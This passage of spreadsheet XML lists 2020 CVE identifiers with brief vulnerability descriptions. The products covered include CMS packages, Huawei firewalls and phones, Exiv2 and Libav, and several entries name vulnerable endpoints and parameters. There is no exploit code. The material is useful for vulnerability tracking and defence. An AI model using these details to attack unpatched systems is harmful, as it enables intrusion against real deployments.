    <t>Cross Site Request Forgery (CSRF) vulnerability exists in bycms v1.3.0 that can add an admin account via admin.php/ucenter/add.html.</t>
  </si>
  <si>
    <t>CVE-2020-18458</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability exists in DamiCMS v6.0.6 that can add an admin account via admin.php?s=/Admin/doadd.</t>
  </si>
  <si>
    <t>CVE-2020-18460</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability exists in 711cms v1.0.7 that can add an admin account via admin.php?c=Admin&amp;m=content.</t>
  </si>
  <si>
    <t>CVE-2020-18462</t>
  </si>
  <si>
    <t>File Upload vulnerabilty in AikCms v2.0.0 in poster_edit.php because the background file management office does not verify the uploaded file.</t>
  </si>
  <si>
    <t>CVE-2020-18463</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability exists in v2.0.0 in video_list.php, which can let a malicious user delete a video message.</t>
  </si>
  <si>
    <t>CVE-2020-18464</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability in AikCms 2.0.0 in video_list.php, which can let a malicious user delete movie information.</t>
  </si>
  <si>
    <t>CVE-2020-18467</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerabilty exists in BigTree-CMS 4.4.3 in the tag name field found in the Tags page under the General menu via a crafted website name by doing an authenticated POST HTTP request to admin/tags/create.</t>
  </si>
  <si>
    <t>CVE-2020-18468</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in qdPM 9.1 in the Heading field found in the Login Page page under the General menu via a crafted website name by doing an authenticated POST HTTP request to /qdPM_9.1/index.php/configuration.</t>
  </si>
  <si>
    <t>CVE-2020-18469</t>
  </si>
  <si>
    <t>Stored cross-site scripting (XSS) vulnerability in the Copyright Text field found in the Application page under the Configuration menu in Rukovoditel 2.4.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to /rukovoditel_2.4.1/index.php?module=configuration/save&amp;redirect_to=configuration/application.</t>
  </si>
  <si>
    <t>CVE-2020-1847</t>
  </si>
  <si>
    <t>There is a denial of service vulnerability in some Huawei products. There is no protection against the attack scenario of specific protocol. A remote, unauthorized attackers can construct attack scenarios, which leads to denial of service.Affected product versions include:NIP6300 versions V500R001C30,V500R001C60;NIP6600 versions V500R001C30,V500R001C60;Secospace USG6300 versions V500R001C30,V500R001C60;Secospace USG6500 versions V500R001C30,V500R001C60;Secospace USG6600 versions V500R001C30,V500R001C60;USG9500 versions V500R001C30,V500R001C60.</t>
  </si>
  <si>
    <t>CVE-2020-18470</t>
  </si>
  <si>
    <t>Stored cross-site scripting (XSS) vulnerability in the Name of application field found in the General Configuration page in Rukovoditel 2.4.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to rukovoditel_2.4.1/install/index.php.</t>
  </si>
  <si>
    <t>CVE-2020-18475</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerabilty exists in Hucart CMS 5.7.4 is via the mes_title field. The first user inserts a malicious script into the header field of the outbox and sends it to other users. When other users open the email, the malicious code will be executed.</t>
  </si>
  <si>
    <t>CVE-2020-18476</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Hucart CMS 5.7.4 via the basic information field found in the avatar usd_image field.</t>
  </si>
  <si>
    <t>CVE-2020-18477</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Hucart CMS 5.7.4 via the purchase enquiry field found in the Message con_content field.</t>
  </si>
  <si>
    <t>CVE-2020-1848</t>
  </si>
  <si>
    <t>There is a resource management error vulnerability in Jackman-AL00D versions 8.2.0.185(C00R2P1). Local attackers construct malicious application files, causing system applications to run abnormally.</t>
  </si>
  <si>
    <t>CVE-2020-1853</t>
  </si>
  <si>
    <t>GaussDB 200 with version of 6.5.1 have a path traversal vulnerability. Due to insufficient input path validation, an authenticated attacker can traverse directories and download files to a specific directory. Successful exploit may cause information leakage.</t>
  </si>
  <si>
    <t>CVE-2020-18544</t>
  </si>
  <si>
    <t>SQL Injection in WMS v1.0 allows remote attackers to execute arbitrary code via the "username" parameter in the component "chkuser.php".</t>
  </si>
  <si>
    <t>CVE-2020-1855</t>
  </si>
  <si>
    <t>Huawei HEGE-570 version 1.0.1.22(SP3); and HEGE-560, OSCA-550, OSCA-550A, OSCA-550AX, and OSCA-550X version 1.0.1.21(SP3) have an insufficient verification vulnerability. An attacker can access the device physically and exploit this vulnerability to tamper with device information. Successful exploit may cause service abnormal.</t>
  </si>
  <si>
    <t>CVE-2020-1856</t>
  </si>
  <si>
    <t>Huawei NGFW Module, NIP6300, NIP6600, Secospace USG6500, Secospace USG6600, and USG9500 versions V500R001C30, V500R001C60, and V500R005C00 have an information leakage vulnerability. An attacker can exploit this vulnerability by sending specific request packets to affected devices. Successful exploit may lead to information leakage.</t>
  </si>
  <si>
    <t>CVE-2020-18568</t>
  </si>
  <si>
    <t>The D-Link DSR-250 (3.14) DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution.</t>
  </si>
  <si>
    <t>CVE-2020-1857</t>
  </si>
  <si>
    <t>Huawei NIP6800 versions V500R001C30, V500R001C60SPC500, and V500R005C00SPC100; and Secospace USG6600 and USG9500 versions V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, and V500R005C00SPC100 have an information leakage vulnerability. Due to improper processing of some data, a local authenticated attacker can exploit this vulnerability through a series of operations. Successful exploitation may cause information leakage.</t>
  </si>
  <si>
    <t>CVE-2020-1858</t>
  </si>
  <si>
    <t>Huawei products NIP6800 versions V500R001C30, V500R001C60SPC500, and V500R005C00SPC100; Secospace USG6600 versions V500R001C30SPC600, V500R001C60SPC500, and V500R005C00SPC100; and USG9500 versions V500R001C30SPC600, V500R001C60SPC500, and V500R005C00SPC100 have a denial of service vulnerability. Attackers need to perform a series of operations in a special scenario to exploit this vulnerability. Successful exploit may cause the new connections can't be established, result in a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-1860</t>
  </si>
  <si>
    <t>NIP6800;Secospace USG6600;USG9500 products with versions of V500R001C30; V500R001C60SPC500; V500R005C00SPC100 have an access control bypass vulnerability. Attackers that can access to the internal network can exploit this vulnerability with careful deployment. Successful exploit may cause the access control to be bypassed, and attackers can directly access the Internet.</t>
  </si>
  <si>
    <t>CVE-2020-1861</t>
  </si>
  <si>
    <t>CloudEngine 12800 with versions of V200R001C00SPC600,V200R001C00SPC700,V200R002C01,V200R002C50SPC800,V200R002C50SPC800PWE,V200R003C00SPC810,V200R003C00SPC810PWE,V200R005C00SPC600,V200R005C00SPC800,V200R005C00SPC800PWE,V200R005C10,V200R005C10SPC300 have an information leakage vulnerability in some Huawei products. In some special cases, an authenticated attacker can exploit this vulnerability because the software processes data improperly. Successful exploitation may lead to information leakage.</t>
  </si>
  <si>
    <t>CVE-2020-1862</t>
  </si>
  <si>
    <t>There is a double free vulnerability in some Huawei products. A local attacker with low privilege may perform some operations to exploit the vulnerability. Due to doubly freeing memory, successful exploit may cause some service abnormal. Affected product versions include:CampusInsight versions V100R019C00;ManageOne versions 6.5.RC2.B050.</t>
  </si>
  <si>
    <t>CVE-2020-1863</t>
  </si>
  <si>
    <t>Huawei USG6000V with versions V500R001C20SPC300, V500R003C00SPC100, and V500R005C00SPC100 have an out-of-bounds read vulnerability. Due to a logical flaw in a JSON parsing routine, a remote, unauthenticated attacker could exploit this vulnerability to disrupt service in the affected products.</t>
  </si>
  <si>
    <t>CVE-2020-1864</t>
  </si>
  <si>
    <t>Some Huawei products have a security vulnerability due to improper authentication. A remote attacker needs to obtain some information and forge the peer device to send specific packets to the affected device. Due to the improper implementation of the authentication function, attackers can exploit the vulnerability to connect to affected devices and execute a series of commands.Affected product versions include:Secospace AntiDDoS8000 versions V500R001C00,V500R001C20,V500R001C60,V500R005C00.</t>
  </si>
  <si>
    <t>CVE-2020-18646</t>
  </si>
  <si>
    <t>Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component "/public/index.php".</t>
  </si>
  <si>
    <t>CVE-2020-18647</t>
  </si>
  <si>
    <t>Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component "/nonecms/vendor".</t>
  </si>
  <si>
    <t>CVE-2020-18648</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) in JuQingCMS v1.0 allows remote attackers to gain local privileges via the component "JuQingCMS_v1.0/admin/index.php?c=administrator&amp;a=add".</t>
  </si>
  <si>
    <t>CVE-2020-1865</t>
  </si>
  <si>
    <t>There is an out-of-bounds read vulnerability in Huawei CloudEngine products. The software reads data past the end of the intended buffer when parsing certain PIM message, an adjacent attacker could send crafted PIM messages to the device, successful exploit could cause out of bounds read when the system does the certain operation.</t>
  </si>
  <si>
    <t>CVE-2020-18654</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Wuzhi CMS v4.1.0 allows remote attackers to execute arbitrary code via the "Title" parameter in the component "/coreframe/app/guestbook/myissue.php".</t>
  </si>
  <si>
    <t>CVE-2020-18657</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in GetSimpleCMS &lt;= 3.3.15 in admin/changedata.php via the redirect_url parameter and the headers_sent function.</t>
  </si>
  <si>
    <t>CVE-2020-18658</t>
  </si>
  <si>
    <t>Cross Site Scriptiong (XSS) vulnerability in GetSimpleCMS &lt;=3.3.15 via the timezone parameter to settings.php.</t>
  </si>
  <si>
    <t>CVE-2020-18659</t>
  </si>
  <si>
    <t>Cross Site Scripting vulnerability in GetSimpleCMS &lt;=3.3.15 via the (1) sitename, (2) username, and (3) email parameters to /admin/setup.php</t>
  </si>
  <si>
    <t>CVE-2020-1866</t>
  </si>
  <si>
    <t>There is an out-of-bounds read vulnerability in several products. The software reads data past the end of the intended buffer when parsing certain crafted DHCP messages. Successful exploit could cause certain service abnormal. Affected product versions include:NIP6800 versions V500R001C30,V500R001C60SPC500,V500R005C00;S12700 versions V200R008C00;S2700 versions V200R008C00;S5700 versions V200R008C00;S6700 versions V200R008C00;S7700 versions V200R008C00;S9700 versions V200R008C00;Secospace USG6600 versions V500R001C30SPC200,V500R001C30SPC600,V500R001C60SPC500,V500R005C00;USG9500 versions V500R001C30SPC300,V500R001C30SPC600,V500R001C60SPC500,V500R005C00.</t>
  </si>
  <si>
    <t>CVE-2020-18660</t>
  </si>
  <si>
    <t>GetSimpleCMS &lt;=3.3.15 has an open redirect in admin/changedata.php via the redirect function to the url parameter.</t>
  </si>
  <si>
    <t>CVE-2020-18661</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in gnuboard5 &lt;=v5.3.2.8 via the url parameter to bbs/login.php.</t>
  </si>
  <si>
    <t>CVE-2020-18662</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in gnuboard5 &lt;=v5.3.2.8 via the table_prefix parameter in install_db.php.</t>
  </si>
  <si>
    <t>CVE-2020-18663</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in gnuboard5 &lt;=v5.3.2.8 via the act parameter in bbs/move_update.php.</t>
  </si>
  <si>
    <t>CVE-2020-18664</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in WebPort &lt;=1.19.1via the connection name parameter in type-conn.</t>
  </si>
  <si>
    <t>CVE-2020-18665</t>
  </si>
  <si>
    <t>Directory Traversal vulnerability in WebPort &lt;=1.19.1 in tags of system settings.</t>
  </si>
  <si>
    <t>CVE-2020-18667</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in WebPort &lt;=1.19.1 via the new connection, parameter name in type-conn.</t>
  </si>
  <si>
    <t>CVE-2020-18668</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerabililty in WebPort &lt;=1.19.1 via the description parameter to script/listcalls.</t>
  </si>
  <si>
    <t>CVE-2020-18670</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulneraibility in Roundcube mail .4.4 via database host and user in /installer/test.php.</t>
  </si>
  <si>
    <t>CVE-2020-18671</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Roundcube Mail &lt;=1.4.4 via smtp config in /installer/test.php.</t>
  </si>
  <si>
    <t>CVE-2020-18683</t>
  </si>
  <si>
    <t>Floodlight through 1.2 has poor input validation in checkFlow in StaticFlowEntryPusherResource.java because of undefined fields mishandling.</t>
  </si>
  <si>
    <t>CVE-2020-18684</t>
  </si>
  <si>
    <t>Floodlight through 1.2 has an integer overflow in checkFlow in StaticFlowEntryPusherResource.java via priority or port number.</t>
  </si>
  <si>
    <t>CVE-2020-18685</t>
  </si>
  <si>
    <t>Floodlight through 1.2 has poor input validation in checkFlow in StaticFlowEntryPusherResource.java because of unchecked prerequisites related to TCP or UDP ports, or group or table IDs.</t>
  </si>
  <si>
    <t>CVE-2020-18693</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in MineWebCMS v1.7.0 allows remote attackers to execute arbitrary code by injecting malicious code into the 'Title' field of the component '/admin/news'.</t>
  </si>
  <si>
    <t>CVE-2020-18694</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) in IgnitedCMS v1.0 allows remote attackers to obtain sensitive information and gain privilege via the component "/admin/profile/save_profile".</t>
  </si>
  <si>
    <t>CVE-2020-18698</t>
  </si>
  <si>
    <t>Improper Authentication in Lin-CMS-Flask v0.1.1 allows remote attackers to launch brute force login attempts without restriction via the 'login' function in the component 'app/api/cms/user.py'.</t>
  </si>
  <si>
    <t>CVE-2020-18699</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Lin-CMS-Flask v0.1.1 allows remote attackers to execute arbitrary code by entering scripts in the the 'Username' parameter of the in component 'app/api/cms/user.py'.</t>
  </si>
  <si>
    <t>CVE-2020-1870</t>
  </si>
  <si>
    <t>There is a denial of service vulnerability in some Huawei products. Due to improper memory management, memory leakage may occur in some special cases. Attackers can perform a series of operations to exploit this vulnerability. Successful exploit may cause a denial of service. Affected product versions include: CloudEngine 12800 versions V200R019C00SPC800; CloudEngine 5800 versions V200R019C00SPC800; CloudEngine 6800 versions V200R005C20SPC800, V200R019C00SPC800; CloudEngine 7800 versions V200R019C00SPC800; NE40E versions V800R011C00SPC200, V800R011C00SPC300, V800R011C10SPC100; NE40E-F versions V800R011C00SPC200, V800R011C10SPC100; NE40E-M versions V800R011C00SPC200, V800R011C10SPC100.</t>
  </si>
  <si>
    <t>CVE-2020-18701</t>
  </si>
  <si>
    <t>Incorrect Access Control in Lin-CMS-Flask v0.1.1 allows remote attackers to obtain sensitive information and/or gain privileges due to the application not invalidating a user's authentication token upon logout, which allows for replaying packets.</t>
  </si>
  <si>
    <t>CVE-2020-18702</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the 'Username' parameter in the component 'quokka/admin/actions.py'.</t>
  </si>
  <si>
    <t>CVE-2020-18703</t>
  </si>
  <si>
    <t>XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component 'quokka/utils/atom.py'.</t>
  </si>
  <si>
    <t>CVE-2020-18704</t>
  </si>
  <si>
    <t>Unrestricted Upload of File with Dangerous Type in Django-Widgy v0.8.4 allows remote attackers to execute arbitrary code via the 'image' widget in the component 'Change Widgy Page'.</t>
  </si>
  <si>
    <t>CVE-2020-18705</t>
  </si>
  <si>
    <t>XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component 'quokka/core/content/views.py'.</t>
  </si>
  <si>
    <t>CVE-2020-1871</t>
  </si>
  <si>
    <t>USG9500 with software of V500R001C30SPC100; V500R001C30SPC200; V500R001C30SPC600; V500R001C60SPC500; V500R005C00SPC100; V500R005C00SPC200 have an improper credentials management vulnerability. The software does not properly manage certain credentials. Successful exploit could cause information disclosure or damage, and impact the confidentiality or integrity.</t>
  </si>
  <si>
    <t>CVE-2020-18713</t>
  </si>
  <si>
    <t>SQL Injection in Rockoa v1.8.7 allows remote attackers to gain privileges due to loose filtering of parameters in customerAction.php</t>
  </si>
  <si>
    <t>CVE-2020-18714</t>
  </si>
  <si>
    <t>SQL Injection in Rockoa v1.8.7 allows remote attackers to gain privileges due to loose filtering of parameters in wordModel.php's getdata function.</t>
  </si>
  <si>
    <t>CVE-2020-18716</t>
  </si>
  <si>
    <t>SQL Injection in Rockoa v1.8.7 allows remote attackers to gain privileges due to loose filtering of parameters in wordAction.php.</t>
  </si>
  <si>
    <t>CVE-2020-18717</t>
  </si>
  <si>
    <t>SQL Injection in ZZZCMS zzzphp 1.7.1 allows remote attackers to execute arbitrary code due to a lack of parameter filtering in inc/zzz_template.php.</t>
  </si>
  <si>
    <t>CVE-2020-1872</t>
  </si>
  <si>
    <t>Huawei smart phones P10 Plus with versions earlier than 9.1.0.201(C01E75R1P12T8), earlier than 9.1.0.252(C185E2R1P9T8), earlier than 9.1.0.252(C432E4R1P9T8), and earlier than 9.1.0.255(C576E6R1P8T8) have a digital balance bypass vulnerability. When re-configuring the mobile phone at the digital balance mode, an attacker can perform some operations to bypass the startup wizard, and then open some switch. As a result, the digital balance function is bypassed.</t>
  </si>
  <si>
    <t>exploits/windows/webapps/49537.txt</t>
  </si>
  <si>
    <t>Alt-N MDaemon webmail 20.0.0 - 'file name' Stored Cross Site Scripting (XSS)</t>
  </si>
  <si>
    <t>2021-02-08</t>
  </si>
  <si>
    <t>CVE-2020-18723</t>
  </si>
  <si>
    <t>Stored cross-site scripting (XSS) in file attachment field in MDaemon webmail 19.5.5 allows an attacker to execute code on the email recipient side while forwarding an email to perform potentially malicious activities.</t>
  </si>
  <si>
    <t>CVE-2020-18724</t>
  </si>
  <si>
    <t>Authenticated stored cross-site scripting (XSS) in the contact name field in the distribution list of MDaemon webmail 19.5.5 allows an attacker to executes code and perform a XSS attack while opening a contact list.</t>
  </si>
  <si>
    <t>CVE-2020-1873</t>
  </si>
  <si>
    <t>NIP6800;Secospace USG6600;USG9500 products with versions of V500R001C30; V500R001C60SPC500; V500R005C00SPC100 have an out-of-bounds read vulnerability. An unauthenticated attacker crafts malformed message with specific parameter and sends the message to the affected products. Due to insufficient validation of message, which may be exploited to cause the device reboot.</t>
  </si>
  <si>
    <t>CVE-2020-18730</t>
  </si>
  <si>
    <t>A segmentation violation in the Iec104_Deal_I function of IEC104 v1.0 allows attackers to cause a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-18731</t>
  </si>
  <si>
    <t>A segmentation violation in the Iec104_Deal_FirmUpdate function of IEC104 v1.0 allows attackers to cause a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-18734</t>
  </si>
  <si>
    <t>A stack buffer overflow in /ddsi/q_bitset.h of Eclipse IOT Cyclone DDS Project v0.1.0 causes the DDS subscriber server to crash.</t>
  </si>
  <si>
    <t>CVE-2020-18735</t>
  </si>
  <si>
    <t>A heap buffer overflow in /src/dds_stream.c of Eclipse IOT Cyclone DDS Project v0.1.0 causes the DDS subscriber server to crash.</t>
  </si>
  <si>
    <t>CVE-2020-18737</t>
  </si>
  <si>
    <t>An issue was discovered in Typora 0.9.67. There is an XSS vulnerability that causes Remote Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-1874</t>
  </si>
  <si>
    <t>NIP6800;Secospace USG6600;USG9500 products versions of V500R001C30; V500R001C60SPC500; V500R005C00SPC100 have a invalid pointer access vulnerability. The software system access an invalid pointer when operator logs in to the device and performs some operations. Successful exploit could cause certain process reboot.</t>
  </si>
  <si>
    <t>CVE-2020-18741</t>
  </si>
  <si>
    <t>Improper Authorization in ThinkSAAS v2.7 allows remote attackers to modify the description of any user's photo via the "photoid%5B%5D" and "photodesc%5B%5D" parameters in the component "index.php?app=photo."</t>
  </si>
  <si>
    <t>CVE-2020-18746</t>
  </si>
  <si>
    <t>SQL Injection in AiteCMS v1.0 allows remote attackers to execute arbitrary code via the component "aitecms/login/diy_list.php".</t>
  </si>
  <si>
    <t>CVE-2020-18748</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Typora v0.9.65 allows attackers to execute arbitrary code via mathjax syntax due to a mathjax configuration error in the mathematical formula blocks. This is a different vulnerability from CVE-2020-18221.</t>
  </si>
  <si>
    <t>CVE-2020-1875</t>
  </si>
  <si>
    <t>NIP6800;Secospace USG6600;USG9500 products versions of V500R001C30; V500R001C60SPC500; V500R005C00SPC100 have an invalid pointer access vulnerability. The software system access an invalid pointer when an abnormal condition occurs in certain operation. Successful exploit could cause certain process reboot. Affected product versions include:NIP6800 versions V500R001C30,V500R001C60SPC500;Secospace USG6600 versions V500R001C30SPC200,V500R001C30SPC600,V500R001C60SPC500;USG9500 versions V500R001C30SPC200,V500R001C30SPC600,V500R001C60SPC500.</t>
  </si>
  <si>
    <t>CVE-2020-18750</t>
  </si>
  <si>
    <t>Buffer overflow in pdf2json 0.69 allows local users to execute arbitrary code by converting a crafted PDF file.</t>
  </si>
  <si>
    <t>CVE-2020-18753</t>
  </si>
  <si>
    <t>An issue in Dut Computer Control Engineering Co.'s PLC MAC1100 allows attackers to gain access to the system and escalate privileges via a crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-18754</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists within Dut Computer Control Engineering Co.'s PLC MAC1100.</t>
  </si>
  <si>
    <t>CVE-2020-18756</t>
  </si>
  <si>
    <t>An arbitrary memory access vulnerability in the EPA protocol of Dut Computer Control Engineering Co.'s PLC MAC1100 allows attackers to read the contents of any variable area.</t>
  </si>
  <si>
    <t>CVE-2020-18757</t>
  </si>
  <si>
    <t>An issue in Dut Computer Control Engineering Co.'s PLC MAC1100 allows attackers to cause persistent denial of service (DOS) via a crafted packet.</t>
  </si>
  <si>
    <t>CVE-2020-18758</t>
  </si>
  <si>
    <t>An issue in Dut Computer Control Engineering Co.'s PLC MAC1100 allows attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-18759</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists in the EPA protocol of Dut Computer Control Engineering Co.'s PLC MAC1100.</t>
  </si>
  <si>
    <t>CVE-2020-1876</t>
  </si>
  <si>
    <t>NIP6800;Secospace USG6600;USG9500 with versions of V500R001C30; V500R001C60SPC500; V500R005C00SPC100 have an out-of-bounds write vulnerability. An unauthenticated attacker crafts malformed packets with specific parameter and sends the packets to the affected products. Due to insufficient validation of packets, which may be exploited to cause the process reboot.</t>
  </si>
  <si>
    <t>CVE-2020-18766</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability AntSword v2.0.7 can remotely execute system commands.</t>
  </si>
  <si>
    <t>CVE-2020-1877</t>
  </si>
  <si>
    <t>NIP6800;Secospace USG6600;USG9500 with versions of V500R001C30; V500R001C60SPC500; V500R005C00SPC100 have an invalid pointer access vulnerability. The software system access an invalid pointer when administrator log in to the device and performs some operations. Successful exploit could cause certain process reboot.</t>
  </si>
  <si>
    <t>CVE-2020-18771</t>
  </si>
  <si>
    <t>Exiv2 0.27.99.0 has a global buffer over-read in Exiv2::Internal::Nikon1MakerNote::print0x0088 in nikonmn_int.cpp which can result in an information leak.</t>
  </si>
  <si>
    <t>CVE-2020-18773</t>
  </si>
  <si>
    <t>An invalid memory access in the decode function in iptc.cpp of Exiv2 0.27.99.0 allows attackers to cause a denial of service (DOS) via a crafted tif file.</t>
  </si>
  <si>
    <t>CVE-2020-18774</t>
  </si>
  <si>
    <t>A float point exception in the printLong function in tags_int.cpp of Exiv2 0.27.99.0 allows attackers to cause a denial of service (DOS) via a crafted tif file.</t>
  </si>
  <si>
    <t>CVE-2020-18775</t>
  </si>
  <si>
    <t>In Libav 12.3, there is a heap-based buffer over-read in vc1_decode_b_mb_intfi in vc1_block.c that allows an attacker to cause denial-of-service via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-18776</t>
  </si>
  <si>
    <t>In Libav 12.3, there is a segmentation fault in vc1_decode_b_mb_intfr in vc1_block.c that allows an attacker to cause denial-of-service via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-18778</t>
  </si>
  <si>
    <t>In Libav 12.3, there is a heap-based buffer over-read in vc1_decode_p_mb_intfi in vc1_block.c that allows an attacker to cause denial-of-service via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-1878</t>
  </si>
  <si>
    <t>Huawei smartphone OxfordS-AN00A with versions earlier than 10.0.1.152D(C735E152R3P3),versions earlier than 10.0.1.160(C00E160R4P1) have an improper authentication vulnerability. Authentication to target component is improper when device performs an operation. Attackers exploit this vulnerability to obtain some information by loading malicious application, leading to information leak.</t>
  </si>
  <si>
    <t>CVE-2020-1879</t>
  </si>
  <si>
    <t>There is an improper integrity checking vulnerability on some huawei products. The software of the affected product has an improper integrity check which may allow an attacker with high privilege to make malicious modifications.Affected product versions include:HEGE-560 versions 1.0.1.21(SP3);HEGE-570 versions 1.0.1.22(SP3);OSCA-550 versions 1.0.1.21(SP3);OSCA-550A versions 1.0.1.21(SP3);OSCA-550AX versions 1.0.1.21(SP3);OSCA-550X versions 1.0.1.21(SP3).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-1880</t>
  </si>
  <si>
    <t>Huawei smartphone Lion-AL00C with versions earlier than 10.0.0.205(C00E202R7P2) have a denial of service vulnerability. An attacker crafted specially file to the affected device. Due to insufficient input validation of the value when executing the file, successful exploit may cause device abnormal.</t>
  </si>
  <si>
    <t>CVE-2020-1881</t>
  </si>
  <si>
    <t>NIP6800;Secospace USG6600;USG9500 products with versions of V500R001C30; V500R001C60SPC500; V500R005C00SPC100 have have a resource management error vulnerability. An attacker needs to perform specific operations to trigger a function of the affected device. Due to improper resource management of the function, the vulnerability can be exploited to cause service abnormal on affected devices.</t>
  </si>
  <si>
    <t>CVE-2020-1882</t>
  </si>
  <si>
    <t>Huawei mobile phones Ever-L29B versions earlier than 10.0.0.180(C185E6R3P3), earlier than 10.0.0.180(C432E6R1P7), earlier than 10.0.0.180(C636E5R2P3); HUAWEI Mate 20 RS versions earlier than 10.0.0.175(C786E70R3P8); HUAWEI Mate 20 X versions earlier than 10.0.0.176(C00E70R2P8); and Honor Magic2 versions earlier than 10.0.0.175(C00E59R2P11) have an improper authorization vulnerability. Due to improper authorization of some function, attackers can bypass the authorization to perform some operations.</t>
  </si>
  <si>
    <t>CVE-2020-1883</t>
  </si>
  <si>
    <t>Huawei products NIP6800;Secospace USG6600;USG9500 have a memory leak vulnerability. An attacker with high privileges exploits this vulnerability by continuously performing specific operations. Successful exploitation of this vulnerability can cause service abnormal.</t>
  </si>
  <si>
    <t>CVE-2020-1885</t>
  </si>
  <si>
    <t>Writing to an unprivileged file from a privileged OVRRedir.exe process in Oculus Desktop before 1.44.0.32849 on Windows allows local users to write to arbitrary files and consequently gain privileges via vectors involving a hard link to a log file.</t>
  </si>
  <si>
    <t>CVE-2020-1886</t>
  </si>
  <si>
    <t>A buffer overflow in WhatsApp for Android prior to v2.20.11 and WhatsApp Business for Android prior to v2.20.2 could have allowed an out-of-bounds write via a specially crafted video stream after receiving and answering a malicious video call.</t>
  </si>
  <si>
    <t>CVE-2020-1887</t>
  </si>
  <si>
    <t>Incorrect validation of the TLS SNI hostname in osquery versions after 2.9.0 and before 4.2.0 could allow an attacker to MITM osquery traffic in the absence of a configured root chain of trust.</t>
  </si>
  <si>
    <t>CVE-2020-18875</t>
  </si>
  <si>
    <t>Incorrect Access Control in DotCMS versions before 5.1 allows remote attackers to gain privileges by injecting client configurations via vtl (velocity) files.</t>
  </si>
  <si>
    <t>CVE-2020-18877</t>
  </si>
  <si>
    <t>SQL Injection in Wuzhi CMS v4.1.0 allows remote attackers to obtain sensitive information via the 'flag' parameter in the component '/coreframe/app/order/admin/index.php'.</t>
  </si>
  <si>
    <t>CVE-2020-18878</t>
  </si>
  <si>
    <t>Directory Traversal in Skycaiji v1.3 allows remote attackers to obtain sensitive information via the component 'index.php?m=admin&amp;c=Tool&amp;a=log&amp;file=D%3A%5CphpStudy%5CWWW%5Cindex.php'.</t>
  </si>
  <si>
    <t>CVE-2020-18879</t>
  </si>
  <si>
    <t>Unrestricted File Upload in Bludit v3.8.1 allows remote attackers to execute arbitrary code by uploading malicious files via the component 'bl-kereln/ajax/upload-logo.php'.</t>
  </si>
  <si>
    <t>CVE-2020-1888</t>
  </si>
  <si>
    <t>Insufficient boundary checks when decoding JSON in handleBackslash reads out of bounds memory, potentially leading to DOS. This issue affects HHVM 4.45.0, 4.44.0, 4.43.0, 4.42.0, 4.41.0, 4.40.0, 4.39.0, versions between 4.33.0 and 4.38.0 (inclusive), versions between 4.9.0 and 4.32.0 (inclusive), and versions prior to 4.8.7.</t>
  </si>
  <si>
    <t>CVE-2020-18885</t>
  </si>
  <si>
    <t>Command Injection in PHPMyWind v5.6 allows remote attackers to execute arbitrary code via the "text color" field of the component '/admin/web_config.php'.</t>
  </si>
  <si>
    <t>CVE-2020-18886</t>
  </si>
  <si>
    <t>Unrestricted File Upload in PHPMyWind v5.6 allows remote attackers to execute arbitrary code via the component 'admin/upload_file_do.php'.</t>
  </si>
  <si>
    <t>CVE-2020-18888</t>
  </si>
  <si>
    <t>Arbitrary File Deletion vulnerability in puppyCMS v5.1 allows remote malicious attackers to delete the file/folder via /admin/functions.php.</t>
  </si>
  <si>
    <t>CVE-2020-18889</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability in puppyCMS v5.1 that can change the admin's password via /admin/settings.php.</t>
  </si>
  <si>
    <t>CVE-2020-1889</t>
  </si>
  <si>
